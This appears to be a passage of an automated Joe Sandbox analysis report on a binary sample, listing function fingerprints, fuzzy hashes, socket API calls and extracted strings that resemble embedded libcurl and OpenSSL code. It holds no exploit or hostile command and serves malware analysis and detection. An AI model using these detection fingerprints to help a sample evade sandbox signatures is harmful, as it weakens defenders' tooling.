                                    • Instruction Fuzzy Hash: 40D097F24ACA17EF432876B8434DEFAAA0AA84B312F116C37DC03A6072E30005878083
                                    APIs
                                    • closesocket.WS2_32(?,00739422,?,?,?,?,?,?,?,?,?,?,?,w3r,00B08640,00000000), ref: 0073B04D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID:
                                    • API String ID: 2781271927-0
                                    • Opcode ID: 916a5f2d9a05ef8c8141c62767a91e4dc31a11804dbef39e93b375ab38d2b5ea
                                    • Instruction ID: 67801aec38355f472b8559fc0d38c4531fc8a5cf2415c43262cee01880bfaeb0
                                    • Opcode Fuzzy Hash: 916a5f2d9a05ef8c8141c62767a91e4dc31a11804dbef39e93b375ab38d2b5ea
                                    • Instruction Fuzzy Hash: B9D0C23470020157DA288A14C8C4A57722B7FC1310FA8CB6CE12C4A152C73FCC43CA01
                                    APIs
                                    • ioctlsocket.WS2_32(?,8004667E,?,?,006AAF56,?,00000001), ref: 006D67FC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: ioctlsocket
                                    • String ID:
                                    • API String ID: 3577187118-0
                                    • Opcode ID: fe8e9517bbf7195085ed5d016926832b6dc402ad58290e35292400245b7b171a
                                    • Instruction ID: fd7d81672d212ed3b44b79f2b11354356f5c918ce99ed8121b6d4dadcf1e78ad
                                    • Opcode Fuzzy Hash: fe8e9517bbf7195085ed5d016926832b6dc402ad58290e35292400245b7b171a
                                    • Instruction Fuzzy Hash: 15C012F1118601AFC6088714D865A6F76E8DB85355F01581CB04681180EA709990CA16
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 4662233d5e0932fd387c8ef262138e2073c6c5d9c7d76dc6a89f3ed4a651e042
                                    • Instruction ID: b1895c36803dffd4d79e76c6f6e20cc51c63872e6241c53a0446c6dbcee3df90
                                    • Opcode Fuzzy Hash: 4662233d5e0932fd387c8ef262138e2073c6c5d9c7d76dc6a89f3ed4a651e042
                                    • Instruction Fuzzy Hash: 8031B7B09143189FCB00EFB4D6456AEBBF1AF44304F00886DE999A7351E7349A44CF92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558531809.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7400000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16f1ba4b9c7740631960009fa46faec3d2b8926816e2751f8f5b0bc493363df7
                                    • Instruction ID: 836b7f8d7aea8885f1804563da7c46d952e879be058776ac36e3dd71dc3cd51a
                                    • Opcode Fuzzy Hash: 16f1ba4b9c7740631960009fa46faec3d2b8926816e2751f8f5b0bc493363df7
                                    • Instruction Fuzzy Hash: 27F0F6E280C3889AC72796C446143F83EB25B17229F3504FBC8126B2A3D2E40E469395
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558531809.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7400000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6817252d5f6af6302e430c64cceb6c548d662b50f0fb9e91e3ac7ec923d25cea
                                    • Instruction ID: e8e0ffbe9044468d13a1d0022599249ad90e1e0755bac925be3788898486ce23
                                    • Opcode Fuzzy Hash: 6817252d5f6af6302e430c64cceb6c548d662b50f0fb9e91e3ac7ec923d25cea
                                    • Instruction Fuzzy Hash: 90F0A7E751835CEA860B96C486407F93DB35B57176F3200FBD813B72A25AF00D4696E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                    • API String ID: 0-1371176463
                                    • Opcode ID: 724a0c35dcca5aaa60d75d908b5b82b9caaf0dd44506749df71a14bf520c0230
                                    • Instruction ID: 067287edbaedae35284537cd94b72a59c4b34d692285a595ee8a570cd167319b
                                    • Opcode Fuzzy Hash: 724a0c35dcca5aaa60d75d908b5b82b9caaf0dd44506749df71a14bf520c0230
                                    • Instruction Fuzzy Hash: 0CB208F1A08302ABE720AB249C62BE67BD7AF54704F04493CF98D9B392E771D984C755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $d$nil)
                                    • API String ID: 0-394766432
                                    • Opcode ID: 4ac87ff4ea36352da0b09836ba45a6722c2c185c2f47fb104442d11fba033b3c
                                    • Instruction ID: 51f8dbd814fcf5d8d042df2b222ecb472b5cf65ede6b5d21c099eab6564e6936
                                    • Opcode Fuzzy Hash: 4ac87ff4ea36352da0b09836ba45a6722c2c185c2f47fb104442d11fba033b3c
                                    • Instruction Fuzzy Hash: 621369706083498FD720CF29C09076ABBE5BFC9354F244A2DEA959B3A1D775EC45CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                    • API String ID: 0-122532811
                                    • Opcode ID: 59aa231635178173d3f5b9c92909f63f0af556dd0ee4c30580d6d51bceda4df5
                                    • Instruction ID: 0032ca715d9ee14896681d2e15c860d6713d58cb5370dd840965ea1760fa3f61
                                    • Opcode Fuzzy Hash: 59aa231635178173d3f5b9c92909f63f0af556dd0ee4c30580d6d51bceda4df5
                                    • Instruction Fuzzy Hash: 6D42E871B08701AFD708EE24CC41B6BB6DAEFC8704F048A2CF55D97291D775AD158B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                    • API String ID: 0-3977460686
                                    • Opcode ID: c045dc9da4f33c4738fbf20e127e4f914e53f92ad716dddf852bd978e5c6db5a
                                    • Instruction ID: b9af45c4e0c4ef365a9d905708ff0157e8f8e1abb973c442ecb7b8ef9e8b59e1
                                    • Opcode Fuzzy Hash: c045dc9da4f33c4738fbf20e127e4f914e53f92ad716dddf852bd978e5c6db5a
                                    • Instruction Fuzzy Hash: 9A321BB1A083024BC724BF289C4136ABBD79F95320F154B3DE9A59B3D2FB74D9458782
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -vc$ate$attempts$ndot$retr$retr$rota$time$use-$usev
                                    • API String ID: 0-645557312
                                    • Opcode ID: 2a893a68aabf8bf29a6d02c68d3f84a197f5a9d8c508ff6f8f201e3e38894bff
                                    • Instruction ID: 60805017bc0aff04db44bd9f0dfd184dc5d3262b7d930b83a8a35ff66ed465f7
                                    • Opcode Fuzzy Hash: 2a893a68aabf8bf29a6d02c68d3f84a197f5a9d8c508ff6f8f201e3e38894bff
                                    • Instruction Fuzzy Hash: DF61F9E5B08314A7E714A620BC56B3BB2D99BD5304F08843DFD8A96283FE79ED448253
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                    • API String ID: 0-1914377741
                                    • Opcode ID: e556d57700ff3f8430e5149e960f6c80b4e98a0ae99f0f9a655ae0339ddba44d
                                    • Instruction ID: 549ab5e01d262be6d41f6b15c806360869adbad944185048d40982cadc147e0a
                                    • Opcode Fuzzy Hash: e556d57700ff3f8430e5149e960f6c80b4e98a0ae99f0f9a655ae0339ddba44d
                                    • Instruction Fuzzy Hash: FC724A70A08B415FEF228A28C4467E6B7DBAF91744F04862CED864B793E776DD85C381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                    • API String ID: 0-3476178709
                                    • Opcode ID: ce55e7e012399baaf4477f98505d3e315cc6d02b734202454128ff76d1932154
                                    • Instruction ID: a113d557246962308f57a0d232ec3c788cd60db0cf413b197c8d32fa8bbe36ed
                                    • Opcode Fuzzy Hash: ce55e7e012399baaf4477f98505d3e315cc6d02b734202454128ff76d1932154
                                    • Instruction Fuzzy Hash: 1831D872B54A4936F7682009DC46F3E405BC3C5B10F7AC33EBA0BAB6D1D8E59D064369
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                    • API String ID: 0-2550110336
                                    • Opcode ID: b8e8a0bc64cb2497d5f9da7b032b32d6014d79340bb8fac0ab0efd775589f068
                                    • Instruction ID: c0ae4d6086974ba9b68c4407ff4b91fe0e81a8811eafb003a382a5fea98643d2
                                    • Opcode Fuzzy Hash: b8e8a0bc64cb2497d5f9da7b032b32d6014d79340bb8fac0ab0efd775589f068
                                    • Instruction Fuzzy Hash: CD324830B48314ABDB24AA659C9BF7A7791FFC0F04F184529F945DA2C2EBB4D95086C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $.$;$?$?$xn--$xn--
                                    • API String ID: 0-543057197
                                    • Opcode ID: 4f2da9f8191a890b81e83f919c522353186df3b018b3e2341606851b0d38e2a2
                                    • Instruction ID: 8e79ef60ff552dea885662eefd30127f4d8c0ff95583df54e0eef06604d5f2ff
                                    • Opcode Fuzzy Hash: 4f2da9f8191a890b81e83f919c522353186df3b018b3e2341606851b0d38e2a2
                                    • Instruction Fuzzy Hash: 902206B2E09701EBFB209A24DC45B6B76D4AF90388F04453CF99997293E739DD04C792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 0-2555271450
                                    • Opcode ID: c276cc1d2f42720281d96b0fddf3c034ccb9f2079bb555e66056956b5be9c80d
                                    • Instruction ID: 3af483ddc91e300bd08baa77b2fb540ab38d90daa1e26f83144dd47ecb3a11f9
                                    • Opcode Fuzzy Hash: c276cc1d2f42720281d96b0fddf3c034ccb9f2079bb555e66056956b5be9c80d
                                    • Instruction Fuzzy Hash: 0AC259716083418FC714CF28C49076AB7E2AFC9714F19DA6DE89E9B355D730ED468B82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 0-2555271450
                                    • Opcode ID: 83e5641d51324d66960360b3599201a104c62a6b2429b1970da88555e528c8bd
                                    • Instruction ID: 34e2afb25ac30622e0c5952b7a862169767a71ea169ef7c4c2226535e55fe20e
                                    • Opcode Fuzzy Hash: 83e5641d51324d66960360b3599201a104c62a6b2429b1970da88555e528c8bd
                                    • Instruction Fuzzy Hash: A0825D71A083019FD714CF28C880B6BB7E2AFD9724F148A6DE9AD97391D731DC498B52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: default$login$macdef$machine$netrc.c$password
                                    • API String ID: 0-1043775505
                                    • Opcode ID: 58f97db6a7101abf9da8666b4bbd3ac00a20b3dfdfa61ef38dec303ae778a0bc
                                    • Instruction ID: 9c4760e89f1d5f24d13cc3f0fb78fee8d3c56c104dc41735d570fa9fa1c96daf
                                    • Opcode Fuzzy Hash: 58f97db6a7101abf9da8666b4bbd3ac00a20b3dfdfa61ef38dec303ae778a0bc
                                    • Instruction Fuzzy Hash: EAE12470D0C3819BE3209F24D8857AB7BD6AF95708F04442EF88557392E3B9D949CBA6
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FreeTable
                                    • String ID: 127.0.0.1$::1
                                    • API String ID: 3582546490-3302937015
                                    • Opcode ID: da4d29b18a7f1e82688078db060679394cb115b436c0b1c8a43b20832a793236
                                    • Instruction ID: 4ccf9fd0abdaec8a967a1650effad8c92bb7623d47b671936b57e186897e7065
                                    • Opcode Fuzzy Hash: da4d29b18a7f1e82688078db060679394cb115b436c0b1c8a43b20832a793236
                                    • Instruction Fuzzy Hash: 5EA1D0B1C043469BF710DF20C84576AB3E0BF95304F158A29F9899B262F7B9ED90C792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                     • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                    • API String ID: 0-4201740241
